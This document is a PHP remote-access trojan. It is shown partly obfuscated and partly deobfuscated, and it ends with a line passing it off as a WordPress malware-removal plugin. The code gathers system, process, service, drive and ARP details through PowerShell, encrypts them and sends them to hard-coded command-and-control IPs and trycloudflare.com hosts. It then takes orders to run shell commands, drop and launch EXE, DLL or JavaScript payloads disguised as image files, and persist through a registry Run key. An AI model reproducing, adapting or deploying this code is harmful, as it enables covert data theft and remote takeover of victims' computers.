4\x72\x61\164\x6f\162\51\x29\40\x7b\x20\47\101\x44\x4d\111\x4e\47\x20\x7d\x20\145\154\x73\x65\40\173\x20\x27\125\x53\105\122\x27\40\175\40"), $VcFzG, $SNVCT); goto ZE_0z; nGMFa: $VcFzG = ''; goto XSIS3; XSIS3: exec("\x70\x6f\x77\x65\x72\163\150\145\154\154\x20\55\143\x20" . Ebuom("\x74\x61\163\x6b\154\x69\x73\164\40\57\x73\x76\x63\40\x2f\x46\x4f\40\103\123\x56\x20\174\40\103\157\156\x76\145\x72\x74\x46\x72\x6f\x6d\x2d\x43\x73\x76\x20\x7c\x20\103\157\x6e\x76\x65\162\164\124\157\55\x4a\163\157\x6e"), $VcFzG, $SNVCT); goto n7tiF; cfh84: if (!($SNVCT !== 0)) { goto qmKvZ; } goto a8yhg; BYWCw: Cbm6A: goto pq2wR; n7tiF: if (!($SNVCT !== 0)) { goto lpkKR; } goto fca41; SLI_8: $pq8nP["\157\164\150\145\162"]["\162\165\156\x61\x73"] = $VcFzG[0] ?? "\125\x4e\x4b\116\x4f\x57\116"; goto ZDCXZ; cROp6: $pq8nP["\141\x72\160"] = json_decode(implode($z5_HL, $VcFzG), true); goto WI1GD; Ukqd_: lpkKR: goto chqES; M2C6t: qmKvZ: goto GbUQf; ZE_0z: if (!($SNVCT !== 0)) { goto NZsLS; } goto SbC1x; oHGkx: if (!($SNVCT !== 0)) { goto jQNcR; } goto uDsa9; fcuX5: exec("\160\157\x77\145\162\163\150\145\154\x6c\x20\55\143\x20" . EBuoM("\107\x65\x74\x2d\120\x53\x44\x72\x69\166\145\x20\x2d\x50\123\x50\x72\x6f\166\151\144\145\x72\x20\106\x69\x6c\145\123\171\x73\x74\x65\x6d\x20\174\40\x43\157\x6e\x76\145\x72\164\x54\x6f\55\x4a\x73\x6f\x6e"), $VcFzG, $SNVCT); goto oHGkx; UkfT1: return $pq8nP; goto eTsV_; B6O88: exec("\x70\157\167\145\162\163\150\145\x6c\154\40\x2d\143\40" . EBUOM("\163\171\x73\164\145\155\x69\156\146\x6f\x20\x2f\106\117\x20\103\x53\x56\x20\x7c\40\103\157\x6e\x76\145\162\x74\x46\x72\x6f\155\x2d\x43\x73\x76\x20\x7c\x20\x43\157\x6e\x76\145\162\164\x54\157\x2d\x4a\x73\x6f\156"), $VcFzG, $SNVCT); goto XxNYe; Q2gRF: $VcFzG = ''; goto qd8Fr; MyX2j: NZsLS: goto xgZ3l; xgZ3l: $pq8nP["\157\x74\x68\145\162"]["\166\x65\x72\x73\151\x6f\x6e\x5f\x62\165\x69\x6c\144"] = $Zq3dJ; goto CwlsF; fca41: throw new Exception("\x46\141\151\154\x65\144\40\x74\157\x20\145\x78\145\x63\165\164\x65\x20\x63\x6f\155\155\141\x6e\144"); goto Ukqd_; GbUQf: $pq8nP["\x73\x65\162\x76\151\143\145\163"] = json_decode(implode($z5_HL, $VcFzG), true); goto pGDZf; dHiHX: throw new Exception("\x46\x61\x69\x6c\x65\144\40\x74\157\40\x65\170\x65\143\165\x74\145\40\x63\157\155\x6d\141\x6e\144"); goto q8kzY; N1xfT: $pq8nP = []; goto B6O88; tkyF4: global $Zq3dJ, $TRW9p, $z5_HL; goto N1xfT; pq2wR: $pq8nP["\163\171\x73\164\x65\155\151\156\x66\157"] = json_decode(implode($z5_HL, $VcFzG), true); goto Q2gRF; XxNYe: if (!($SNVCT !== 0)) { goto Cbm6A; } goto pKKVZ; AKKdq: jQNcR: goto mT1JM; mT1JM: $pq8nP["\144\x72\151\166\x65\x73"] = json_decode(implode($z5_HL, $VcFzG), true); goto Ux1lu; chqES: $pq8nP["\160\x72\x6f\x63\145\x73\163\145\x73"] = json_decode(implode($z5_HL, $VcFzG), true); goto UBdzF; CwlsF: $pq8nP["\x6f\x74\x68\145\162"]["\x69\x64\137\x6c\157\143\x61\x6c"] = mt_rand(0, 100000000); goto YK3xh; a8yhg: throw new Exception("\x46\141\x69\154\x65\144\40\164\x6f\x20\145\x78\x65\143\165\164\x65\40\x63\x6f\155\155\x61\x6e\x64"); goto M2C6t; WI1GD: $VcFzG = ''; goto UkfT1; q8kzY: lMiQ1: goto cROp6; YK3xh: $pq8nP["\x6f\164\150\x65\x72"]["\151\144\137\x6c\x6f\x61\144\x65\x72"] = 43; goto SLI_8; eTsV_: } goto WepUh; yy3it: return; goto lAcZF; jwiJl: function W2HkM($rWwMf, $ycGYT) { goto NWIh0; G9qtk: fclose($kR8em); goto I3_o1; dhBF1: fwrite($kR8em, $pp0im); goto RtUeM; vvf7m: $V9G8z = $c83RQ->open(stream_get_meta_data($kR8em)["\x75\x72\x69"]); goto iuMN9; MuS06: fHw0a: goto oYwoD; NWIh0: if (file_exists($ycGYT)) { goto fHw0a; } goto X6Dp3; iuMN9: if (!($V9G8z !== true)) { goto tzzRq; } goto G9qtk; nYoIx: tzzRq: goto cBtNY; X6Dp3: if (mkdir($ycGYT, 0777, true)) { goto DKGfe; } goto A3nqo; BbwU7: iwCkU: goto P9hDa; JPUFf: $kR8em = tmpfile(); goto dhBF1; P9hDa: $c83RQ->close(); goto FpIhR; cBtNY: if ($c83RQ->extractTo($ycGYT)) { goto iwCkU; } goto J7IkD; I3_o1: return false; goto nYoIx; A3nqo: return false; goto R2mzG; J7IkD: $c83RQ->close(); goto KgBNv; FpIhR: fclose($kR8em); goto UbUzQ; SfTPK: return false; goto BbwU7; KgBNv: fclose($kR8em); goto SfTPK; UbUzQ: return true; goto B_ohv; RtUeM: rewind($kR8em); goto D_Qpg; oYwoD: $pp0im = file_get_contents($rWwMf); goto JPUFf; D_Qpg: $c83RQ = new Y27bM(); goto vvf7m; R2mzG: DKGfe: goto MuS06; B_ohv: } goto leVfr; ZChWJ: $JpsO7 = 0; goto j6E10; jUDyu: $z5_HL = chr(0xa); goto te03m; fCIkH: $bIiky = lU3Mn(); goto qdHaY; AS66c: gynqD:<?php
$TRW9p = "\"";
$z5_HL = "\n";
if (!($argc < 2 && !N5n7d() || !extension_loaded("zip") && file_exists("/var/www/html/input.php"))) {
$Zq3dJ = 20;
$l2CpU = 80;
$Jw6Sz = ["EXE" => 0, "DLL" => 1, "JS" => 2, "CMD" => 3, "ACTIVE" => 4, "AUTORUN" => 5, "OFF" => 6];
$u9iZC = 0;
$bIiky = lU3Mn();
function N5n7d()
{
global $argv;
return $argv[0] === "Standard input code";
}
function ebUom($CTLfW)
{
global $TRW9p;
return $TRW9p . $CTLfW . $TRW9p;
}
function SqC8C()
{
$ttefF = new DateTime("now", new DateTimeZone("Etc/GMT+5"));
$Py5k4 = (int) $ttefF->getTimestamp() & -4096;
$JZJtV = random_int(PHP_INT_MIN, PHP_INT_MAX);
$qFHIp = $Py5k4 >> 32 & 0xffffffff;
$FnMw5 = $Py5k4 & 0xffffffff;
$gmNZ1 = $JZJtV >> 32 & 0xffffffff;
$WiBhc = $JZJtV & 0xffffffff;
$qFHIp ^= $gmNZ1;
$FnMw5 ^= $WiBhc;
$FnMw5 = $FnMw5 + 0x7ab092fe & 0xffffffff;
$qFHIp = $qFHIp + 0x80952678 + ($FnMw5 < 0x7ab092fe ? 1 : 0) & 0xffffffff;
$qFHIp ^= 0x219f7609;
$FnMw5 ^= 0xd1769498;
$qFHIp ^= 0x86ad5709;
$FnMw5 ^= 0x15de8713;
$WiBhc = $WiBhc + 0x29807914 & 0xffffffff;
$gmNZ1 = $gmNZ1 + 0xf2879630 + ($WiBhc < 0x29807914 ? 1 : 0) & 0xffffffff;
$qFHIp ^= $gmNZ1;
$FnMw5 ^= $WiBhc;
$Pab0F = sprintf("%08x%08x", $qFHIp, $FnMw5);
$ZgXXo = sprintf("%08x%08x", $gmNZ1, $WiBhc);
$NcwlV = DC6tA(rand(0, 14));
$SWHqo = dC6ta(rand(0, 14));
return ($NcwlV !== '' ? "/" . $NcwlV : '') . "/" . dC6ta(rand(0, 14)) . "&" . $Pab0F . $ZgXXo . ($SWHqo !== '' ? "/" . $SWHqo : '');
}
function lu3mN()
{
global $Zq3dJ, $TRW9p, $z5_HL;
$pq8nP = [];
exec("powershell -c " . EBUOM("systeminfo /FO CSV | ConvertFrom-Csv | ConvertTo-Json"), $VcFzG, $SNVCT);
if (!($SNVCT !== 0)) {
$pq8nP["systeminfo"] = json_decode(implode($z5_HL, $VcFzG), true);
$VcFzG = '';
exec("powershell -c " . eBUOm("if ([Security.Principal.WindowsIdentity]::GetCurrent().Name -match '(?i)SYSTEM') { 'SYSTEM' } elseif (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { 'ADMIN' } else { 'USER' } "), $VcFzG, $SNVCT);
if (!($SNVCT !== 0)) {
$pq8nP["other"]["version_build"] = $Zq3dJ;
$pq8nP["other"]["id_local"] = mt_rand(0, 100000000);
$pq8nP["other"]["id_loader"] = 43;
$pq8nP["other"]["runas"] = $VcFzG[0] ?? "UNKNOWN";
$pq8nP["other"]["type_file"] = "PHP";
$VcFzG = '';
exec("powershell -c " . Ebuom("tasklist /svc /FO CSV | ConvertFrom-Csv | ConvertTo-Json"), $VcFzG, $SNVCT);
if (!($SNVCT !== 0)) {
$pq8nP["processes"] = json_decode(null, true);
$VcFzG = '';
exec("powershell -c " . eBUOm("Get-Service | Select-Object -Property Name, DisplayName | ConvertTo-Json"), $VcFzG, $SNVCT);
if (!($SNVCT !== 0)) {
$pq8nP["services"] = json_decode(null, true);
$VcFzG = '';
exec("powershell -c " . EBuoM("Get-PSDrive -PSProvider FileSystem | ConvertTo-Json"), $VcFzG, $SNVCT);
if (!($SNVCT !== 0)) {
$pq8nP["drives"] = json_decode(null, true);
$VcFzG = '';
exec("powershell -c " . eBuom("Get-NetNeighbor -AddressFamily IPv4 | Where-Object { \$_.State -ne 'Permanent' } | Select-Object @{Name='Interface'; Expression={\$_.InterfaceAlias}}, @{Name='Internet Address'; Expression={\$_.IPAddress}}, @{Name='Physical Address'; Expression={\$_.LinkLayerAddress}}, @{Name='Type'; Expression={'dynamic'}} | ConvertTo-Json"), $VcFzG, $SNVCT);
if (!($SNVCT !== 0)) {
$pq8nP["arp"] = json_decode(null, true);
$VcFzG = '';
return $pq8nP;
}
throw new Exception("Failed to execute command");
}
throw new Exception("Failed to execute command");
}
throw new Exception("Failed to execute command");
}
throw new Exception("Failed to execute command");
}
throw new Exception("Failed to execute command");
}
throw new Exception("Failed to execute command");
}
function NkUk9(&$bzn_F, $OcIQg)
{
$uxlfE = ord($OcIQg[0]);
$MpqIM = strlen($bzn_F);
$eUFvf = strlen($OcIQg);
$izpa6 = 0;
UgVfQ:
if (!($izpa6 < $MpqIM)) {
// [PHPDeobfuscator] Implied return
return;
}
$uxlfE = ($uxlfE + ($uxlfE + $izpa6 % 256)) % 256;
$bzn_F[$izpa6] = chr(ord($bzn_F[$izpa6]) ^ (ord($OcIQg[$izpa6 % $eUFvf]) ^ $uxlfE) % 256);
++$izpa6;
goto UgVfQ;
}
function eqiUb($bzn_F)
{
$DBzW7 = mt_rand(0, 100000000);
$mesY9 = pack("V", $DBzW7);
nKUk9($bzn_F, $mesY9);
$wp5cV = $bzn_F . $mesY9;
return gzencode($wp5cV, 5, FORCE_GZIP);
}
function QUZhV($d_22F, $bzn_F)
{
global $l2CpU;
$RKhlJ = ["http" => ["method" => "POST", "header" => ["Content-type: application/octet-stream"], "content" => $bzn_F, "ignore_errors" => true, "timeout" => 20]];
$rWwMf = "http://" . $d_22F . ":" . $l2CpU . sqC8C();
$uz8es = stream_context_create($RKhlJ);
$BW3Wg = null;
set_error_handler(function ($qVljG, $OndyP) use(&$BW3Wg) {
$BW3Wg = $OndyP;
});
$by1ps = file_get_contents($rWwMf, false, $uz8es);
restore_error_handler();
if (!($by1ps === false)) {
$Aarsj = 0;
if (!isset($http_response_header[0])) {
goto n3bJj;
}
preg_match("/HTTP\\/\\d\\.\\d\\s+(\\d{3})/", $http_response_header[0], $Lxf9l);
if (!isset($Lxf9l[1])) {
goto qR0In;
}
$Aarsj = (int) $Lxf9l[1];
qR0In:
n3bJj:
return ["content" => $by1ps, "headers" => $http_response_header, "status" => $http_response_header[0] ?? null, "code" => $Aarsj];
}
throw new Exception("HTTP request failed: " . ($BW3Wg ?: "Unknown error"));
}
function W2HkM($rWwMf, $ycGYT)
{
if (file_exists($ycGYT)) {
goto fHw0a;
}
if (mkdir($ycGYT, 0777, true)) {
fHw0a:
$pp0im = file_get_contents($rWwMf);
$kR8em = tmpfile();
fwrite($kR8em, $pp0im);
rewind($kR8em);
$c83RQ = new Y27bM();
$V9G8z = $c83RQ->open(stream_get_meta_data($kR8em)["uri"]);
if (!($V9G8z !== true)) {
if ($c83RQ->extractTo($ycGYT)) {
$c83RQ->close();
fclose($kR8em);
return true;
}
$c83RQ->close();
fclose($kR8em);
return false;
}
fclose($kR8em);
return false;
}
return false;
}
function Zj6UF()
{
global $TRW9p, $z5_HL;
if (N5n7D()) {
$OPdCw = "." . dc6Ta(12) . ".txt";
$xJ5KY = shell_exec("wmic process where processid=" . getmypid() . " get commandline");
if (!(!$xJ5KY || !preg_match_all("/\\s-r\\s/", $xJ5KY))) {
$XYh87 = explode($z5_HL, $xJ5KY, 2);
$gGkCt = trim($XYh87[1] ?? '');
$UAqhd = preg_split("/php\\.exe.*?\\s-r\\s+/", $gGkCt, 2);
$hiPBF = isset($UAqhd[1]) ? trim(str_replace($TRW9p, '', $UAqhd[1])) : '';
file_put_contents($OPdCw, $hiPBF);
goto qWHem;
}
return false;
}
$OPdCw = "/var/www/html/input.php";
qWHem:
exec("reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v " . EbuoM(vqaIz()) . " /t REG_SZ /d " . EbuOm("\\" . $TRW9p . PHP_BINARY . "\\" . $TRW9p . " \\" . $TRW9p . $OPdCw . "\\" . $TRW9p) . " /f");
return true;
}
function VQAIZ()
{
$XEMm8 = scandir(getenv("APPDATA")) + scandir(getenv("LOCALAPPDATA"));
$XEMm8 = array_diff($XEMm8, [".", ".."]);
$XEMm8 = array_values($XEMm8);
print_r($XEMm8);
return $XEMm8[rand(0, count($XEMm8) - 1)];
}
function dc6ta($M3_yG = 16)
{
$Gmm_S = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
$rPvk7 = strlen($Gmm_S);
$CTLfW = '';
$izpa6 = 0;
jBUAd:
if (!($izpa6 < $M3_yG)) {
return $CTLfW;
}
$CTLfW .= $Gmm_S[rand(0, $rPvk7 - 1)];
$izpa6++;
goto jBUAd;
}
$tPTLN = null;
function kWB_d($F3c9H)
{
global $tPTLN;
$P80xZ = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
$m4lMb = proc_open($F3c9H, $P80xZ, $Fa3EX);
if (is_resource($m4lMb)) {
$tPTLN = ["process" => $m4lMb, "pipes" => $Fa3EX];
// [PHPDeobfuscator] Implied return
return;
}
return "<failed>";
}
function SQ9Nz()
{
global $tPTLN;
if (!(!$tPTLN || !isset($tPTLN["process"]) || !isset($tPTLN["pipes"]))) {
$m4lMb = $tPTLN["process"];
$Fa3EX = $tPTLN["pipes"];
if (!proc_get_status($m4lMb)["running"]) {
$tPTLN = null;
$OeoM5 = stream_get_contents($Fa3EX[1]);
$AirsC = stream_get_contents($Fa3EX[2]);
fclose($Fa3EX[0]);
fclose($Fa3EX[1]);
fclose($Fa3EX[2]);
$jzdVa = proc_close($m4lMb);
$f9Lnh = "out:PHP_EOL";
if ($OeoM5) {
$f9Lnh .= $OeoM5;
goto omgp5;
}
$f9Lnh .= "<empty>";
omgp5:
if (!$AirsC) {
goto bA9U2;
}
$f9Lnh .= "PHP_EOLerr(" . $jzdVa . "):" . PHP_EOL . $AirsC;
bA9U2:
return $f9Lnh;
}
echo "\$last_command == runningPHP_EOL";
return null;
}
echo "\$last_command == nullPHP_EOL";
return null;
}
function nrRh4($yQKMW, $F3c9H)
{
global $TRW9p, $z5_HL;
$EcbYV = "powershell.exe -WindowStyle Hidden -c " . eBuOm("Start-Process -WindowStyle Hidden -FilePath '" . $yQKMW . "'" . ($F3c9H ? " -ArgumentList '" . preg_replace("/" . $TRW9p . "/", "\\" . $TRW9p, $F3c9H) . "'" : ''));
echo $EcbYV . $z5_HL . $z5_HL;
shell_exec($EcbYV);
}
function m3tzg()
{
$A94N8 = getenv("APPDATA") . "\\" . vqAIz() . rand(0, 1000000);
mkdir($A94N8);
return $A94N8;
}
function KVUj0($d_22F)
{
global $bIiky, $Jw6Sz, $TRW9p, $u9iZC;
if (!(($Wp4BQ = sQ9NZ()) !== null)) {
goto Wa39F;
}
$bIiky["cmd"] = $Wp4BQ;
Wa39F:
$hiPBF = QuZhv($d_22F, EQIuB(json_encode($bIiky, JSON_PRETTY_PRINT)));
unset($bIiky["cmd"]);
$FbIQb = $hiPBF["content"];
$Aarsj = $hiPBF["code"];
if (!($Aarsj == 204)) {
if (!($Aarsj !== 200)) {
$v9iU7 = substr($FbIQb, strlen($FbIQb) - 4, strlen($FbIQb));
$FbIQb = substr($FbIQb, 0, strlen($FbIQb) - 4);
NKuK9($FbIQb, $v9iU7);
$R1Ohn = ord($FbIQb[strlen($FbIQb) - 1]);
$FbIQb = substr($FbIQb, 0, strlen($FbIQb) - 1);
$F3c9H = null;
switch ($R1Ohn) {
case $Jw6Sz["CMD"]:
echo "CMDPHP_EOL";
Kwb_D($FbIQb);
return;
case $Jw6Sz["ACTIVE"]:
echo "ACTIVEPHP_EOL";
$u9iZC = unpack("V", $FbIQb)[1];
return;
case $Jw6Sz["AUTORUN"]:
echo "AUTORUNPHP_EOL";
Zj6uF();
return;
case $Jw6Sz["OFF"]:
echo "OFFPHP_EOL";
exit(0);
case $Jw6Sz["EXE"]:
echo "EXEPHP_EOL";
$yQKMW = M3tZG() . "\\" . dc6Ta(8) . ".exe";
file_put_contents($yQKMW, $FbIQb);
goto asPv7;
case $Jw6Sz["DLL"]:
echo "DLLPHP_EOL";
$q6oxc = M3TZG() . "\\" . DC6TA(8) . ".png";
$yQKMW = "C:\\Windows\\System32\\rundll32.exe";
$F3c9H = ebuom($q6oxc) . " start";
file_put_contents($q6oxc, $FbIQb);
goto asPv7;
case $Jw6Sz["JS"]:
echo "JSPHP_EOL";
$yQKMW = getenv("APPDATA") . "\\" . "node-v21.7.3-win-x64\\node.exe";
if (!(!file_exists($yQKMW) && !W2hkm("http://nodejs.org/dist/v21.7.3/node-v21.7.3-win-x64.zip", getenv("APPDATA")))) {
$F3c9H = M3tzG() . "\\" . dC6Ta(8) . ".jpg";
file_put_contents($F3c9H, $FbIQb);
goto asPv7;
}
echo "failed install nodejsPHP_EOL";
return;
default:
echo "OTHERPHP_EOL";
file_put_contents(m3Tzg() . "\\" . dc6ta(8) . ".txt", $FbIQb);
return;
}
asPv7:
nrrh4($yQKMW, $F3c9H);
// [PHPDeobfuscator] Implied return
return;
}
throw new Exception("HTTP request failed: " . $Aarsj);
}
echo "204PHP_EOL";
return;
}
$oQjHi = 10;
$IpuLn = ["159.69.187.78", "184.95.51.165"];
$KCom5 = ["never-powered-agency-hear.trycloudflare.com", "ears-circus-cam-lake.trycloudflare.com", "varying-rentals-calgary-predict.trycloudflare.com"];
if (count($KCom5) > 0) {
$d_22F = $KCom5[mt_rand(0, 1000) % count($KCom5)];
goto Zik3U;
}
$d_22F = $IpuLn[mt_rand(0, 1000) % count($IpuLn)];
Zik3U:
$IBb3A = 200;
$JpsO7 = 0;
a1o7w:
if (!true) {
// [PHPDeobfuscator] Implied script end
return;
}
try {
echo $d_22F . PHP_EOL;
echo $JpsO7 . PHP_EOL;
kvuJ0($d_22F);
if ($u9iZC > 0) {
$oQjHi = 10;
$u9iZC--;
goto cNCkn;
}
$oQjHi = 10;
cNCkn:
if ($JpsO7 >= $IBb3A + 10) {
$JpsO7 = $IBb3A - 10;
if (!(count($KCom5) > 0)) {
goto VLxTz;
}
$d_22F = $KCom5[mt_rand(0, 1000) % count($KCom5)];
VLxTz:
goto JqlRr;
}
if ($JpsO7 < $IBb3A) {
$JpsO7 = 0;
goto FTcDh;
}
$JpsO7++;
FTcDh:
JqlRr:
} catch (Throwable $kA4rd) {
echo $z5_HL . "Error: " . $kA4rd->getMessage() . $z5_HL;
$JpsO7++;
if ($JpsO7 < $IBb3A && count($KCom5) > 0) {
$d_22F = $KCom5[mt_rand(0, 1000) % count($KCom5)];
goto ZCOA5;
}
$d_22F = $IpuLn[mt_rand(0, 1000) % count($IpuLn)];
ZCOA5:
$oQjHi = 10;
$u9iZC = 0;
}
echo "delay: 10PHP_EOL";
echo "active_cnt: 0PHP_EOL";
sleep($oQjHi);
goto a1o7w;
}
NRrh4(PHP_BINARY, "-d extension=zip -d extension_dir=ext " . eBUom("/var/www/html/input.php") . " 1");
return;Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.